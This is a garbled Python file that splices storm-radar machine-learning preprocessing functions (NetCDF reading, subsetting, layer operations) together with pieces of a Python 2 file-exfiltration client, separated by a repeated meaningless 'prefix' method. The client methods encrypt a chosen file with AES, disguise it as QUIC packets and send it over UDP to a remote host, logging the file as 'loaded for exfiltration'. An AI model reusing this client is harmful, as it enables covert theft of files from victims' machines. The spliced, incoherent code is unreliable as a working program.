storm_times_unix_sec = this_radar_image_dict[storm_images.VALID_TIMES_KEY] these_indices = tracking_utils.find_storm_objects( all_id_strings=orig_full_id_strings, all_times_unix_sec=orig_storm_times_unix_sec, id_strings_to_keep=full_id_strings, times_to_keep_unix_sec=storm_times_unix_sec, allow_missing=False) target_matrix = target_matrix[these_indices, :] azimuthal_shear_field_names = [ storm_images.image_file_name_to_field(f) for f in azimuthal_shear_file_names ] reflectivity_heights_m_agl = numpy.array([ storm_images.image_file_name_to_height(f) for f in reflectivity_file_names ], dtype=int) num_reflectivity_heights = len(reflectivity_file_names) tuple_of_image_matrices = () for j in range(num_reflectivity_heights): if j != 0: print('Reading data from: "{0:s}"...'.format( reflectivity_file_names[j] )) this_radar_image_dict = storm_images.read_storm_images( netcdf_file_name=reflectivity_file_names[j], full_id_strings_to_keep=full_id_strings, valid_times_to_keep_unix_sec=storm_times_unix_sec) this_matrix = numpy.expand_dims( this_radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY], axis=-1 ) tuple_of_image_matrices += (this_matrix,) example_dict = { FULL_IDS_KEY: full_id_strings, STORM_TIMES_KEY: storm_times_unix_sec, RADAR_FIELDS_KEY: azimuthal_shear_field_names, RADAR_HEIGHTS_KEY: reflectivity_heights_m_agl, ROTATED_GRIDS_KEY: this_radar_image_dict[storm_images.ROTATED_GRIDS_KEY], ROTATED_GRID_SPACING_KEY: this_radar_image_dict[storm_images.ROTATED_GRID_SPACING_KEY], REFL_IMAGE_MATRIX_KEY: dl_utils.stack_radar_heights( tuple_of_image_matrices), TARGET_MATRIX_KEY: target_matrix } if sounding_file_name is not None: example_dict.update({ SOUNDING_FIELDS_KEY: sounding_field_names, SOUNDING_HEIGHTS_KEY: sounding_heights_m_agl, SOUNDING_MATRIX_KEY: sounding_matrix }) num_az_shear_fields = len(azimuthal_shear_file_names) tuple_of_image_matrices = () for j in range(num_az_shear_fields): print('Reading data from: "{0:s}"...'.format( azimuthal_shear_file_names[j] )) this_radar_image_dict = storm_images.read_storm_images( netcdf_file_name=azimuthal_shear_file_names[j], full_id_strings_to_keep=full_id_strings, valid_times_to_keep_unix_sec=storm_times_unix_sec) tuple_of_image_matrices += ( this_radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY], ) example_dict.update({ AZ_SHEAR_IMAGE_MATRIX_KEY: dl_utils.stack_radar_fields( tuple_of_image_matrices) }) return example_dict
def prefix(self): return True
def decrypt(self, enc): # enc = base64.b64decode(enc) iv = enc[:AES.block_size] cipher = AES.new(self.key, AES.MODE_CBC, iv) return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')
def prefix(self): return True
def _read_metadata_from_example_file(netcdf_file_name, include_soundings): """Reads metadata from file with input examples. :param netcdf_file_name: Path to input file. :param include_soundings: Boolean flag. If True and file contains soundings, this method will return keys "sounding_field_names" and "sounding_heights_m_agl". Otherwise, will not return said keys. :return: example_dict: Dictionary with the following keys (explained in doc to `write_example_file`). example_dict['full_id_strings'] example_dict['storm_times_unix_sec'] example_dict['radar_field_names'] example_dict['radar_heights_m_agl'] example_dict['rotated_grids'] example_dict['rotated_grid_spacing_metres'] example_dict['target_names'] example_dict['sounding_field_names'] example_dict['sounding_heights_m_agl'] :return: netcdf_dataset: Instance of `netCDF4.Dataset`, which can be used to keep reading file. """ netcdf_dataset = netCDF4.Dataset(netcdf_file_name) include_soundings = ( include_soundings and SOUNDING_FIELDS_KEY in netcdf_dataset.variables ) example_dict = { ROTATED_GRIDS_KEY: bool(getattr(netcdf_dataset, ROTATED_GRIDS_KEY)), TARGET_NAMES_KEY: [ str(s) for s in netCDF4.chartostring(netcdf_dataset.variables[TARGET_NAMES_KEY][:]) ], FULL_IDS_KEY: [ str(s) for s in netCDF4.chartostring(netcdf_dataset.variables[FULL_IDS_KEY][:]) ], STORM_TIMES_KEY: numpy.array( netcdf_dataset.variables[STORM_TIMES_KEY][:], dtype=int ), RADAR_FIELDS_KEY: [ str(s) for s in netCDF4.chartostring(netcdf_dataset.variables[RADAR_FIELDS_KEY][:]) ], RADAR_HEIGHTS_KEY: numpy.array( netcdf_dataset.variables[RADAR_HEIGHTS_KEY][:], dtype=int ) } # TODO(thunderhoser): This is a HACK to deal with bad files. example_dict[TARGET_NAMES_KEY] = [ n for n in example_dict[TARGET_NAMES_KEY] if n != '' ] if example_dict[ROTATED_GRIDS_KEY]: example_dict[ROTATED_GRID_SPACING_KEY] = getattr( netcdf_dataset, ROTATED_GRID_SPACING_KEY) else: example_dict[ROTATED_GRID_SPACING_KEY] = None if not include_soundings: return example_dict, netcdf_dataset example_dict.update({ SOUNDING_FIELDS_KEY: [ str(s) for s in netCDF4.chartostring( netcdf_dataset.variables[SOUNDING_FIELDS_KEY][:]) ], SOUNDING_HEIGHTS_KEY: numpy.array(netcdf_dataset.variables[SOUNDING_HEIGHTS_KEY][:], dtype=int) }) return example_dict, netcdf_dataset
def prefix(self): return True
def _pad(self, s): return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)
def prefix(self): return True
def _compare_metadata(netcdf_dataset, example_dict): """Compares metadata between existing NetCDF file and new batch of examples. This method contains a large number of `assert` statements. If any of the `assert` statements fails, this method will error out. :param netcdf_dataset: Instance of `netCDF4.Dataset`. :param example_dict: See doc for `write_examples_with_3d_radar`. :raises: ValueError: if the two sets have different metadata. """ include_soundings = SOUNDING_MATRIX_KEY in example_dict orig_example_dict = { TARGET_NAMES_KEY: [ str(s) for s in netCDF4.chartostring(netcdf_dataset.variables[TARGET_NAMES_KEY][:]) ], ROTATED_GRIDS_KEY: bool(getattr(netcdf_dataset, ROTATED_GRIDS_KEY)), RADAR_FIELDS_KEY: [ str(s) for s in netCDF4.chartostring( netcdf_dataset.variables[RADAR_FIELDS_KEY][:]) ], RADAR_HEIGHTS_KEY: numpy.array( netcdf_dataset.variables[RADAR_HEIGHTS_KEY][:], dtype=int ) } if example_dict[ROTATED_GRIDS_KEY]: orig_example_dict[ROTATED_GRID_SPACING_KEY] = int( getattr(netcdf_dataset, ROTATED_GRID_SPACING_KEY) ) if include_soundings: orig_example_dict[SOUNDING_FIELDS_KEY] = [ str(s) for s in netCDF4.chartostring( netcdf_dataset.variables[SOUNDING_FIELDS_KEY][:]) ] orig_example_dict[SOUNDING_HEIGHTS_KEY] = numpy.array( netcdf_dataset.variables[SOUNDING_HEIGHTS_KEY][:], dtype=int ) for this_key in orig_example_dict: if isinstance(example_dict[this_key], numpy.ndarray): if numpy.array_equal(example_dict[this_key], orig_example_dict[this_key]): continue else: if example_dict[this_key] == orig_example_dict[this_key]: continue error_string = ( '\n"{0:s}" in existing NetCDF file:\n{1:s}\n\n"{0:s}" in new batch ' 'of examples:\n{2:s}\n\n' ).format( this_key, str(orig_example_dict[this_key]), str(example_dict[this_key]) ) raise ValueError(error_string)
def prefix(self): return True
def _unpad(s): return s[:-ord(s[len(s)-1:])]
def prefix(self): return True
def _filter_examples_by_class(target_values, downsampling_dict, test_mode=False): """Filters examples by target value. E = number of examples :param target_values: length-E numpy array of target values (integer class labels). :param downsampling_dict: Dictionary, where each key is the integer ID for a target class (-2 for "dead storm") and the corresponding value is the number of examples desired from said class. If `downsampling_dict is None`, `example_dict` will be returned without modification. :param test_mode: Never mind. Just leave this alone. :return: indices_to_keep: 1-D numpy array with indices of examples to keep. These are all integers in [0, E - 1]. """ num_examples = len(target_values) if downsampling_dict is None: return numpy.linspace(0, num_examples - 1, num=num_examples, dtype=int) indices_to_keep = numpy.array([], dtype=int) class_keys = list(downsampling_dict.keys()) for this_class in class_keys: this_num_storm_objects = downsampling_dict[this_class] these_indices = numpy.where(target_values == this_class)[0] this_num_storm_objects = min( [this_num_storm_objects, len(these_indices)] ) if this_num_storm_objects == 0: continue if test_mode: these_indices = these_indices[:this_num_storm_objects] else: these_indices = numpy.random.choice( these_indices, size=this_num_storm_objects, replace=False) indices_to_keep = numpy.concatenate((indices_to_keep, these_indices)) return indices_to_keep
def prefix(self): return True
def __init__(self, host, key, port=443, max_size=4096): # Params for all class self.host = host self.port = port self.max_size = max_size - 60 self.AESDriver = AESCipher(key=key) self.serv_addr = (host, port) # Class Globals self.max_packets = 255 # Limitation by QUIC itself. self._genSeq() # QUIC Sequence is used to know that this is the same sequence, # and it's a 20 byte long that is kept the same through out the # session and is transfered hex encoded. self.delay = 0.1 self.sock = None if self._createSocket() is 1: # Creating a UDP socket object sys.exit(1) self.serv_addr = (self.host, self.port) # Creating socket addr format
def prefix(self): return True
def _file_name_to_batch_number(example_file_name): """Parses batch number from file. :param example_file_name: See doc for `find_example_file`. :return: batch_number: Integer. :raises: ValueError: if batch number cannot be parsed from file name. """ pathless_file_name = os.path.split(example_file_name)[-1] extensionless_file_name = os.path.splitext(pathless_file_name)[0] return int(extensionless_file_name.split('input_examples_batch')[-1])
def prefix(self): return True
def _genSeq(self): self.raw_sequence = random.getrandbits(64) parts = [] while self.raw_sequence: parts.append(self.raw_sequence & limit) self.raw_sequence >>= 32 self.sequence = struct.pack('<' + 'L'*len(parts), *parts) # struct.unpack('<LL', '\xb1l\x1c\xb1\x11"\x10\xf4') return 0
def prefix(self): return True
def _check_target_vars(target_names): """Error-checks list of target variables. Target variables must all have the same mean lead time (average of min and max lead times) and event type (tornado or wind). :param target_names: 1-D list with names of target variables. Each must be accepted by `target_val_utils.target_name_to_params`. :return: mean_lead_time_seconds: Mean lead time (shared by all target variables). :return: event_type_string: Event type. :raises: ValueError: if target variables do not all have the same mean lead time or event type. """ error_checking.assert_is_string_list(target_names) error_checking.assert_is_numpy_array( numpy.array(target_names), num_dimensions=1 ) num_target_vars = len(target_names) mean_lead_times = numpy.full(num_target_vars, -1, dtype=int) event_type_strings = numpy.full(num_target_vars, '', dtype=object) for k in range(num_target_vars): this_param_dict = target_val_utils.target_name_to_params( target_names[k] ) event_type_strings[k] = this_param_dict[target_val_utils.EVENT_TYPE_KEY] mean_lead_times[k] = int(numpy.round( (this_param_dict[target_val_utils.MAX_LEAD_TIME_KEY] + this_param_dict[target_val_utils.MIN_LEAD_TIME_KEY]) / 2 )) if len(numpy.unique(mean_lead_times)) != 1: error_string = ( 'Target variables (listed below) have different mean lead times.' '\n{0:s}' ).format(str(target_names)) raise ValueError(error_string) if len(numpy.unique(event_type_strings)) != 1: error_string = ( 'Target variables (listed below) have different event types.\n{0:s}' ).format(str(target_names)) raise ValueError(error_string) return mean_lead_times[0], event_type_strings[0]
def prefix(self): return True
def _createSocket(self): try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.sock = sock return 0 except socket.error as e: sys.stderr.write("[!]\tFailed to create a UDP socket.\n%s.\n" % e) return 1
def prefix(self): return True
def _check_layer_operation(example_dict, operation_dict): """Error-checks layer operation. Such operations are used for dimensionality reduction (to convert radar data from 3-D to 2-D). :param example_dict: See doc for `reduce_examples_3d_to_2d`. :param operation_dict: Dictionary with the following keys. operation_dict["radar_field_name"]: Field to which operation will be applied. operation_dict["operation_name"]: Name of operation (must be in list `VALID_LAYER_OPERATION_NAMES`). operation_dict["min_height_m_agl"]: Minimum height of layer over which operation will be applied. operation_dict["max_height_m_agl"]: Max height of layer over which operation will be applied. :raises: ValueError: if something is wrong with the operation params. """ if operation_dict[RADAR_FIELD_KEY] in AZIMUTHAL_SHEAR_FIELD_NAMES: error_string = ( 'Layer operations cannot be applied to azimuthal-shear fields ' '(such as "{0:s}").' ).format(operation_dict[RADAR_FIELD_KEY]) raise ValueError(error_string) if (operation_dict[RADAR_FIELD_KEY] == radar_utils.REFL_NAME and REFL_IMAGE_MATRIX_KEY in example_dict): pass else: if (operation_dict[RADAR_FIELD_KEY] not in example_dict[RADAR_FIELDS_KEY]): error_string = ( '\n{0:s}\nExamples contain only radar fields listed above, ' 'which do not include "{1:s}".' ).format( str(example_dict[RADAR_FIELDS_KEY]), operation_dict[RADAR_FIELD_KEY] ) raise ValueError(error_string) if operation_dict[OPERATION_NAME_KEY] not in VALID_LAYER_OPERATION_NAMES: error_string = ( '\n{0:s}\nValid operations (listed above) do not include ' '"{1:s}".' ).format( str(VALID_LAYER_OPERATION_NAMES), operation_dict[OPERATION_NAME_KEY] ) raise ValueError(error_string) min_height_m_agl = operation_dict[MIN_HEIGHT_KEY] max_height_m_agl = operation_dict[MAX_HEIGHT_KEY] error_checking.assert_is_geq( min_height_m_agl, numpy.min(example_dict[RADAR_HEIGHTS_KEY]) ) error_checking.assert_is_leq( max_height_m_agl, numpy.max(example_dict[RADAR_HEIGHTS_KEY]) ) error_checking.assert_is_greater(max_height_m_agl, min_height_m_agl)
def prefix(self): return True
def _getQUICHeader(self, count): if type(count) is not hex: try: count_id = chr(count) except: sys.stderr.write("Count must be int or hex.\n") return 1 else: count_id = count if count > self.max_packets: sys.stderr.write("[-]\tCount must be maximum of 255.\n") return 1 header = "\x0c" # Public Flags header += self.sequence # Adding CID header += count_id # Packet Count return header
def prefix(self): return True
def _apply_layer_operation(example_dict, operation_dict): """Applies layer operation to radar data. :param example_dict: See doc for `reduce_examples_3d_to_2d`. :param operation_dict: See doc for `_check_layer_operation`. :return: new_radar_matrix: E-by-M-by-N numpy array resulting from layer operation. """ _check_layer_operation(example_dict=example_dict, operation_dict=operation_dict) height_diffs_metres = ( example_dict[RADAR_HEIGHTS_KEY] - operation_dict[MIN_HEIGHT_KEY] ).astype(float) height_diffs_metres[height_diffs_metres > 0] = -numpy.inf min_height_index = numpy.argmax(height_diffs_metres) height_diffs_metres = ( operation_dict[MAX_HEIGHT_KEY] - example_dict[RADAR_HEIGHTS_KEY] ).astype(float) height_diffs_metres[height_diffs_metres > 0] = -numpy.inf max_height_index = numpy.argmax(height_diffs_metres) operation_dict[MIN_HEIGHT_KEY] = example_dict[ RADAR_HEIGHTS_KEY][min_height_index] operation_dict[MAX_HEIGHT_KEY] = example_dict[ RADAR_HEIGHTS_KEY][max_height_index] operation_name = operation_dict[OPERATION_NAME_KEY] operation_function = OPERATION_NAME_TO_FUNCTION_DICT[operation_name] if REFL_IMAGE_MATRIX_KEY in example_dict: orig_matrix = example_dict[REFL_IMAGE_MATRIX_KEY][ ..., min_height_index:(max_height_index + 1), 0] else: field_index = example_dict[RADAR_FIELDS_KEY].index( operation_dict[RADAR_FIELD_KEY]) orig_matrix = example_dict[RADAR_IMAGE_MATRIX_KEY][ ..., min_height_index:(max_height_index + 1), field_index] return operation_function(orig_matrix, axis=-1), operation_dict
def prefix(self): return True
def _getFileContent(self, file_path): try: f = open(file_path, 'rb') data = f.read() f.close() sys.stdout.write("[+]\tFile '%s' was loaded for exfiltration.\n" % file_path) return data except IOError, e: sys.stderr.write("[-]\tUnable to read file '%s'.\n%s.\n" % (file_path, e)) return 1
def prefix(self): return True
def _subset_radar_data( example_dict, netcdf_dataset_object, example_indices_to_keep, field_names_to_keep, heights_to_keep_m_agl, num_rows_to_keep, num_columns_to_keep): """Subsets radar data by field, height, and horizontal extent. If the file contains both 2-D shear images and 3-D reflectivity images (like MYRORSS data): - `field_names_to_keep` will be interpreted as a list of shear fields to keep. If None, all shear fields will be kept. - `heights_to_keep_m_agl` will be interpreted as a list of reflectivity heights to keep. If None, all reflectivity heights will be kept. If the file contains only 2-D images, `field_names_to_keep` and `heights_to_keep_m_agl` will be considered together, as a list of field/height pairs to keep. If either argument is None, then all field-height pairs will be kept. If the file contains only 3-D images, `field_names_to_keep` and `heights_to_keep_m_agl` will be considered separately: - `field_names_to_keep` will be interpreted as a list of fields to keep. If None, all fields will be kept. - `heights_to_keep_m_agl` will be interpreted as a list of heights to keep. If None, all heights will be kept. :param example_dict: See output doc for `_read_metadata_from_example_file`. :param netcdf_dataset_object: Same. :param example_indices_to_keep: 1-D numpy array with indices of examples (storm objects) to keep. These are examples in `netcdf_dataset_object` for which radar data will be added to `example_dict`. :param field_names_to_keep: See discussion above. :param heights_to_keep_m_agl: See discussion above. :param num_rows_to_keep: Number of grid rows to keep. Images will be center-cropped (i.e., rows will be removed from the edges) to meet the desired number of rows. If None, all rows will be kept. :param num_columns_to_keep: Same as above but for columns. :return: example_dict: Same as input but with the following exceptions. [1] Keys "radar_field_names" and "radar_heights_m_agl" may have different values. [2] If file contains both 2-D and 3-D images, dictionary now contains keys "reflectivity_image_matrix_dbz" and "az_shear_image_matrix_s01". [3] If file contains only 2-D or only 3-D images, dictionary now contains key "radar_image_matrix". """ if field_names_to_keep is None: field_names_to_keep = copy.deepcopy(example_dict[RADAR_FIELDS_KEY]) if heights_to_keep_m_agl is None: heights_to_keep_m_agl = example_dict[RADAR_HEIGHTS_KEY] + 0 error_checking.assert_is_numpy_array( numpy.array(field_names_to_keep), num_dimensions=1 ) heights_to_keep_m_agl = numpy.round(heights_to_keep_m_agl).astype(int) error_checking.assert_is_numpy_array( heights_to_keep_m_agl, num_dimensions=1) if RADAR_IMAGE_MATRIX_KEY in netcdf_dataset_object.variables: radar_matrix = numpy.array( netcdf_dataset_object.variables[RADAR_IMAGE_MATRIX_KEY][ example_indices_to_keep, ... ], dtype=float ) num_radar_dimensions = len(radar_matrix.shape) - 2 if num_radar_dimensions == 2: these_indices = [ numpy.where(numpy.logical_and( example_dict[RADAR_FIELDS_KEY] == f, example_dict[RADAR_HEIGHTS_KEY] == h ))[0][0] for f, h in zip(field_names_to_keep, heights_to_keep_m_agl) ] these_indices = numpy.array(these_indices, dtype=int) radar_matrix = radar_matrix[..., these_indices] else: these_field_indices = numpy.array([ example_dict[RADAR_FIELDS_KEY].index(f) for f in field_names_to_keep ], dtype=int) radar_matrix = radar_matrix[..., these_field_indices] these_height_indices = numpy.array([ numpy.where(example_dict[RADAR_HEIGHTS_KEY] == h)[0][0] for h in heights_to_keep_m_agl ], dtype=int) radar_matrix = radar_matrix[..., these_height_indices, :] radar_matrix = storm_images.downsize_storm_images( storm_image_matrix=radar_matrix, radar_field_name=field_names_to_keep[0], num_rows_to_keep=num_rows_to_keep, num_columns_to_keep=num_columns_to_keep) example_dict[RADAR_IMAGE_MATRIX_KEY] = radar_matrix else: reflectivity_matrix_dbz = numpy.array( netcdf_dataset_object.variables[REFL_IMAGE_MATRIX_KEY][ example_indices_to_keep, ... ], dtype=float ) reflectivity_matrix_dbz = numpy.expand_dims( reflectivity_matrix_dbz, axis=-1 ) azimuthal_shear_matrix_s01 = numpy.array( netcdf_dataset_object.variables[AZ_SHEAR_IMAGE_MATRIX_KEY][ example_indices_to_keep, ... ], dtype=float ) these_height_indices = numpy.array([ numpy.where(example_dict[RADAR_HEIGHTS_KEY] == h)[0][0] for h in heights_to_keep_m_agl ], dtype=int) reflectivity_matrix_dbz = reflectivity_matrix_dbz[ ..., these_height_indices, :] these_field_indices = numpy.array([ example_dict[RADAR_FIELDS_KEY].index(f) for f in field_names_to_keep ], dtype=int) azimuthal_shear_matrix_s01 = azimuthal_shear_matrix_s01[ ..., these_field_indices] reflectivity_matrix_dbz = storm_images.downsize_storm_images( storm_image_matrix=reflectivity_matrix_dbz, radar_field_name=radar_utils.REFL_NAME, num_rows_to_keep=num_rows_to_keep, num_columns_to_keep=num_columns_to_keep) azimuthal_shear_matrix_s01 = storm_images.downsize_storm_images( storm_image_matrix=azimuthal_shear_matrix_s01, radar_field_name=field_names_to_keep[0], num_rows_to_keep=num_rows_to_keep, num_columns_to_keep=num_columns_to_keep) example_dict[REFL_IMAGE_MATRIX_KEY] = reflectivity_matrix_dbz example_dict[AZ_SHEAR_IMAGE_MATRIX_KEY] = azimuthal_shear_matrix_s01 example_dict[RADAR_FIELDS_KEY] = field_names_to_keep example_dict[RADAR_HEIGHTS_KEY] = heights_to_keep_m_agl return example_dict
def prefix(self): return True
def sendFile(self, file_path): # Get File content data = self._getFileContent(file_path) if data == 1: return 1 # Check that the file is not too big. if len(data) > (self.max_packets * self.max_size): sys.stderr.write("[!]\tFile is too big for export.\n") return 1 # If the file is not too big, start exfiltration # Exfiltrate first packet md5_sum = md5(file_path) # Get MD5 sum of file packets_count = (len(data) / self.max_size)+1 # Total packets first_packet = self._getQUICHeader(count=0) # Get header for first file r_data = "%s;%s;%s" % (file_path, md5_sum, packets_count) # First header r_data = self.AESDriver.encrypt(r_data) # Encrypt data self.sock.sendto(first_packet + r_data, self.serv_addr) # Send the data sys.stdout.write("[+]\tSent initiation packet.\n") # encrypted_content = self.AESDriver.encrypt(data) # Encrypt the Chunks raw_dat = "" chunks = [] while data: raw_dat += data[:self.max_size] enc_chunk = self.AESDriver.encrypt(data[:self.max_size]) print len(enc_chunk) chunks.append(enc_chunk) data = data[self.max_size:] i = 1 for chunk in chunks: this_data = self._getQUICHeader(count=i) this_data += chunk self.sock.sendto(this_data, self.serv_addr) time.sleep(self.delay) sys.stdout.write("[+]\tSent chunk %s/%s.\n" % (i, packets_count)) i += 1 sys.stdout.write("[+]\tFinished sending file '%s' to '%s:%s'.\n" % (file_path, self.host, self.port)) # self.sequence = struct.pack('<' + 'L'*len(parts), *parts) return 0
def prefix(self): return True
def _subset_sounding_data( example_dict, netcdf_dataset_object, example_indices_to_keep, field_names_to_keep, heights_to_keep_m_agl): """Subsets sounding data by field and height. :param example_dict: See doc for `_subset_radar_data`. :param netcdf_dataset_object: Same. :param example_indices_to_keep: Same. :param field_names_to_keep: 1-D list of field names to keep. If None, will keep all fields. :param heights_to_keep_m_agl: 1-D numpy array of heights to keep. If None, will keep all heights. :return: example_dict: Same as input but with the following exceptions. [1] Keys "sounding_field_names" and "sounding_heights_m_agl" may have different values. [2] Key "sounding_matrix" has been added. """ if field_names_to_keep is None: field_names_to_keep = copy.deepcopy(example_dict[SOUNDING_FIELDS_KEY]) if heights_to_keep_m_agl is None: heights_to_keep_m_agl = example_dict[SOUNDING_HEIGHTS_KEY] + 0 error_checking.assert_is_numpy_array( numpy.array(field_names_to_keep), num_dimensions=1 ) heights_to_keep_m_agl = numpy.round(heights_to_keep_m_agl).astype(int) error_checking.assert_is_numpy_array( heights_to_keep_m_agl, num_dimensions=1) sounding_matrix = numpy.array( netcdf_dataset_object.variables[SOUNDING_MATRIX_KEY][ example_indices_to_keep, ... ], dtype=float ) # TODO(thunderhoser): This is a HACK. spfh_index = example_dict[SOUNDING_FIELDS_KEY].index( soundings.SPECIFIC_HUMIDITY_NAME) temp_index = example_dict[SOUNDING_FIELDS_KEY].index( soundings.TEMPERATURE_NAME) pressure_index = example_dict[SOUNDING_FIELDS_KEY].index( soundings.PRESSURE_NAME) theta_v_index = example_dict[SOUNDING_FIELDS_KEY].index( soundings.VIRTUAL_POTENTIAL_TEMPERATURE_NAME) sounding_matrix[..., spfh_index][ numpy.isnan(sounding_matrix[..., spfh_index]) ] = 0. nan_example_indices, nan_height_indices = numpy.where(numpy.isnan( sounding_matrix[..., theta_v_index] )) if len(nan_example_indices) > 0: this_temp_matrix_kelvins = sounding_matrix[..., temp_index][ nan_example_indices, nan_height_indices] this_pressure_matrix_pa = sounding_matrix[..., pressure_index][ nan_example_indices, nan_height_indices] this_thetav_matrix_kelvins = ( temp_conversion.temperatures_to_potential_temperatures( temperatures_kelvins=this_temp_matrix_kelvins, total_pressures_pascals=this_pressure_matrix_pa) ) sounding_matrix[..., theta_v_index][ nan_example_indices, nan_height_indices ] = this_thetav_matrix_kelvins these_indices = numpy.array([ example_dict[SOUNDING_FIELDS_KEY].index(f) for f in field_names_to_keep ], dtype=int) sounding_matrix = sounding_matrix[..., these_indices] these_indices = numpy.array([ numpy.where(example_dict[SOUNDING_HEIGHTS_KEY] == h)[0][0] for h in heights_to_keep_m_agl ], dtype=int) sounding_matrix = sounding_matrix[..., these_indices, :] example_dict[SOUNDING_FIELDS_KEY] = field_names_to_keep example_dict[SOUNDING_HEIGHTS_KEY] = heights_to_keep_m_agl example_dict[SOUNDING_MATRIX_KEY] = sounding_matrix return example_dict
def prefix(self): return True
def close(self): time.sleep(0.1) self.sock.close() return 0
def prefix(self): return True
def find_storm_images_2d( top_directory_name, radar_source, radar_field_names, first_spc_date_string, last_spc_date_string, radar_heights_m_agl=None, reflectivity_heights_m_agl=None): """Locates files with 2-D storm-centered radar images. D = number of SPC dates in time period (`first_spc_date_string`... `last_spc_date_string`) :param top_directory_name: Name of top-level directory. Files therein will be found by `storm_images.find_storm_image_file`. :param radar_source: Data source (must be accepted by `radar_utils.check_data_source`). :param radar_field_names: 1-D list of radar fields. Each item must be accepted by `radar_utils.check_field_name`. :param first_spc_date_string: First SPC date (format "yyyymmdd"). This method will locate files from `first_spc_date_string`... `last_spc_date_string`. :param last_spc_date_string: Same. :param radar_heights_m_agl: [used only if radar_source = "gridrad"] 1-D numpy array of radar heights (metres above ground level). These heights apply to all radar fields. :param reflectivity_heights_m_agl: [used only if radar_source != "gridrad"] 1-D numpy array of reflectivity heights (metres above ground level). These heights do not apply to other radar fields. :return: radar_file_name_matrix: D-by-C numpy array of file paths. """ radar_utils.check_data_source(radar_source) first_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec( first_spc_date_string) last_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec( last_spc_date_string) if radar_source == radar_utils.GRIDRAD_SOURCE_ID: storm_image_file_dict = storm_images.find_many_files_gridrad( top_directory_name=top_directory_name, radar_field_names=radar_field_names, radar_heights_m_agl=radar_heights_m_agl, start_time_unix_sec=first_spc_date_unix_sec, end_time_unix_sec=last_spc_date_unix_sec, one_file_per_time_step=False, raise_error_if_all_missing=True) else: storm_image_file_dict = storm_images.find_many_files_myrorss_or_mrms( top_directory_name=top_directory_name, radar_source=radar_source, radar_field_names=radar_field_names, reflectivity_heights_m_agl=reflectivity_heights_m_agl, start_time_unix_sec=first_spc_date_unix_sec, end_time_unix_sec=last_spc_date_unix_sec, one_file_per_time_step=False, raise_error_if_all_missing=True, raise_error_if_any_missing=False) radar_file_name_matrix = storm_image_file_dict[ storm_images.IMAGE_FILE_NAMES_KEY] num_file_times = radar_file_name_matrix.shape[0] if radar_source == radar_utils.GRIDRAD_SOURCE_ID: num_field_height_pairs = ( radar_file_name_matrix.shape[1] * radar_file_name_matrix.shape[2] ) radar_file_name_matrix = numpy.reshape( radar_file_name_matrix, (num_file_times, num_field_height_pairs) ) time_missing_indices = numpy.unique( numpy.where(radar_file_name_matrix == '')[0] ) return numpy.delete( radar_file_name_matrix, time_missing_indices, axis=0)
def prefix(self): return True
def find_storm_images_3d( top_directory_name, radar_source, radar_field_names, radar_heights_m_agl, first_spc_date_string, last_spc_date_string): """Locates files with 3-D storm-centered radar images. D = number of SPC dates in time period (`first_spc_date_string`... `last_spc_date_string`) :param top_directory_name: See doc for `find_storm_images_2d`. :param radar_source: Same. :param radar_field_names: List (length F_r) of radar fields. Each item must be accepted by `radar_utils.check_field_name`. :param radar_heights_m_agl: numpy array (length H_r) of radar heights (metres above ground level). :param first_spc_date_string: First SPC date (format "yyyymmdd"). This method will locate files from `first_spc_date_string`... `last_spc_date_string`. :param last_spc_date_string: Same. :return: radar_file_name_matrix: numpy array (D x F_r x H_r) of file paths. """ radar_utils.check_data_source(radar_source) first_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec( first_spc_date_string) last_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec( last_spc_date_string) if radar_source == radar_utils.GRIDRAD_SOURCE_ID: file_dict = storm_images.find_many_files_gridrad( top_directory_name=top_directory_name, radar_field_names=radar_field_names, radar_heights_m_agl=radar_heights_m_agl, start_time_unix_sec=first_spc_date_unix_sec, end_time_unix_sec=last_spc_date_unix_sec, one_file_per_time_step=False, raise_error_if_all_missing=True) else: file_dict = storm_images.find_many_files_myrorss_or_mrms( top_directory_name=top_directory_name, radar_source=radar_source, radar_field_names=[radar_utils.REFL_NAME], reflectivity_heights_m_agl=radar_heights_m_agl, start_time_unix_sec=first_spc_date_unix_sec, end_time_unix_sec=last_spc_date_unix_sec, one_file_per_time_step=False, raise_error_if_all_missing=True, raise_error_if_any_missing=False) radar_file_name_matrix = file_dict[storm_images.IMAGE_FILE_NAMES_KEY] num_file_times = radar_file_name_matrix.shape[0] if radar_source != radar_utils.GRIDRAD_SOURCE_ID: radar_file_name_matrix = numpy.reshape( radar_file_name_matrix, (num_file_times, 1, len(radar_heights_m_agl)) ) time_missing_indices = numpy.unique( numpy.where(radar_file_name_matrix == '')[0] ) return numpy.delete( radar_file_name_matrix, time_missing_indices, axis=0)
def prefix(self): return True
def find_storm_images_2d3d_myrorss( top_directory_name, first_spc_date_string, last_spc_date_string, reflectivity_heights_m_agl): """Locates files with 2-D and 3-D storm-centered radar images. Fields in 2-D images: low-level and mid-level azimuthal shear Field in 3-D images: reflectivity D = number of SPC dates in time period (`first_spc_date_string`... `last_spc_date_string`) :param top_directory_name: See doc for `find_storm_images_2d`. :param first_spc_date_string: Same. :param last_spc_date_string: Same. :param reflectivity_heights_m_agl: Same. :return: az_shear_file_name_matrix: D-by-2 numpy array of file paths. Files in column 0 are low-level az shear; files in column 1 are mid-level az shear. :return: reflectivity_file_name_matrix: D-by-H numpy array of file paths, where H = number of reflectivity heights. """ first_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec( first_spc_date_string) last_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec( last_spc_date_string) field_names = AZIMUTHAL_SHEAR_FIELD_NAMES + [radar_utils.REFL_NAME] storm_image_file_dict = storm_images.find_many_files_myrorss_or_mrms( top_directory_name=top_directory_name, radar_source=radar_utils.MYRORSS_SOURCE_ID, radar_field_names=field_names, reflectivity_heights_m_agl=reflectivity_heights_m_agl, start_time_unix_sec=first_spc_date_unix_sec, end_time_unix_sec=last_spc_date_unix_sec, one_file_per_time_step=False, raise_error_if_all_missing=True, raise_error_if_any_missing=False) radar_file_name_matrix = storm_image_file_dict[ storm_images.IMAGE_FILE_NAMES_KEY] time_missing_indices = numpy.unique( 